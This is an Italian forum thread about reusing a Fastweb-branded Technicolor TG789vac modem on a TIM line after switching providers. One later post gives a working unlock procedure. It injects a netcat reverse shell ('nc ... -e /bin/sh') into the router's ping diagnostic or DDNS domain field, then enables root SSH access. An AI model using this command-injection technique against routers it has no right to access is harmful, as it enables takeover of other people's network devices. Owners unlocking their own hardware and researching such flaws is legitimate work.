Modem in questione Technicolor TG789vac Xtream_IAD brandizzato fastweb.

Salve, ho avviato oggi la procedura per passare dalla mia adsl 20 mega fastweb a Tim fibra xdsl connect senza l'acquisto di modem abbinato.

Mi stavo chiedendo, poiche' quando sottoscrissi la mia offerta con fastweb 4 anni fa il modem era in regalo (sicuramente non ho mai pagato per averlo, non ricordo bene se c'era la dicitura esplicita di regalo), immagino che grazie alle ultime delibere AGCOM non sia necessario restituirlo e che debbano esser sbloccati per poter essere utilizzati anche con altri operatori (correggetemi se sbaglio).

Mi chiedevo se fosse possibile utilizzarlo direttamente sulla nuova linea TIM oppure se ho bisogno di effettuare qualche procedura/chiamata a fastweb.
Avete consigli? Mi conviene prendere un tim hub a 30 euro su ebay?
Personalmente mi trovavo bene con questo modem scolapasta.

CloudXIII che debbano esser sbloccati per poter essere utilizzati anche con altri operatori (correggetemi se sbaglio).

La questione dello sblocco vale per i modem acquistati e soprattutto nessuno l'ha messa in pratica.
    Se ci tieni ad usarlo devi sbloccarlo autonomamente scavando in altri forum

Direi che fai prima a comprarne un altro 😅 se non hai stretti vincoli economici

Prova con autoflashgui, male che va lo resetti.

Mi son preso un tim hub di corsa, da ieri ad oggi mi sono accorto che i prezzi sul nuovo si stanno alzando parecchio, addirittura c'e' chi ne compra a stock, probabilmente per tirarci su un business.
    Non mi stupirei se finissero le scorte. Anche perche' mi chiedo, dove li trovano tutti questi modem da dar via a poco? Un modem del genere credo valesse molto di piu' di quei 27 euro a cui veniva venduto nuovo.

Se un giorno mi si dovesse rompere il timhub provero' a sbloccare il fastgate, fa comodo avere un modem di riserva.

andreagdipaolo un addetto ai lavori mi ha parlato di furti dai magazzini, ma non so quanto sia veritiero

Matteo_Mabesolani non potrebbero essere anche tecnici che li trafficano sotto banco?

un anno dopo

Buonasera ragazzi, avete novità su questo argomento? È possibile adesso sbloccare il modem per una nuova linea TIM? Grazie

Se parliamo del modem in oggetto, Technicolor TG789vac Xtream_IAD (scolapasta bianco brandizzato Fastweb, fermo alla release 16.2), ce l'ho anch'io e l'ho sbloccato da tempo. Niente autoflashgui, basta seguire questa procedura:

1- Assicuratevi di non avere firewall attivi sul PC

2- Collegate il router al PC ed annotatevi l'IP che utilizza questo ultimo

3- Lanciare netcat in ascolto sul PC (esiste anche la versione windows, si scarica facilmente)
        nc -lvvp 10001
        "10001" è la porta TCP di ascolto, potete usare una porta alta ( 1024-65535 ) qualunque. La 10001 è quella che si trova in tanti esempi

4- Aprite la pagina di diagnostica -> Ping & Traceroute -> nella sezione "indirizzi IP" inserite:

:::::::;nc IP_DEL_PC 10001 -e /bin/sh

e lanciate il test del ping. Sul PC dovrebbe comparire la scritta "connected to IP_DEL_ROUTER"

5- adesso sul PC lanciate i comandi per attivare l'utenza root ed il servizio SSH dropbear:

passwd root
        <inventatevi una password di root - va inserita e poi confermata>

uci set dropbear.@dropbear[0].PasswordAuth='on'
        uci set dropbear.@dropbear[0].Interface='lan'
        uci set dropbear.@dropbear[0].RootPasswordAuth='on'
        uci set dropbear.@dropbear[0].RootLogin='1'
        uci set dropbear.@dropbear[0].enable='1'
        uci commit
        sed -i 's#root:/bin/false#root:/bin/ash#' /etc/passwd
        /etc/init.d/dropbear restart

FINE!

Se il punto 4 non funziona provate con il servizio DynDNS:

4b- Aprite pagina “Servizi WAN”, andate nella nella sezione DDNS e inserite questa stringa nel campo “Dominio”:

www.ooo.com; nc IP_DEL_PC 10001 -e /bin/sh &

Attivate il servizio DynDNS e infine salvate

Se non ricordo male, a me ha funzionato il punto 4b.
        Dopodiché potete installare la GUI di Ansuel oppure, se siete utenti esperti, potete operare direttamente sui file di configurazione da console ssh (come faccio io!).

P.S. Il suddetto modem non va restituito a seguito di disdetta/migrazione (quelli vecchi non li rivogliono più).

dariuccio83 no scusate non era quello il modello... Ho il fastgate credo nuovo, me lo ha messo il tecnico un po' di mesi fa perché l'altro si era guastato

Informativa privacy - Informativa cookie - Termini e condizioni - Regolamento - Disclaimer - 🏳️‍🌈
          P.I. IT16712091004 - info@fibraclick.it

♻️ Il server di questo sito è alimentato al 100% con energia rinnovabile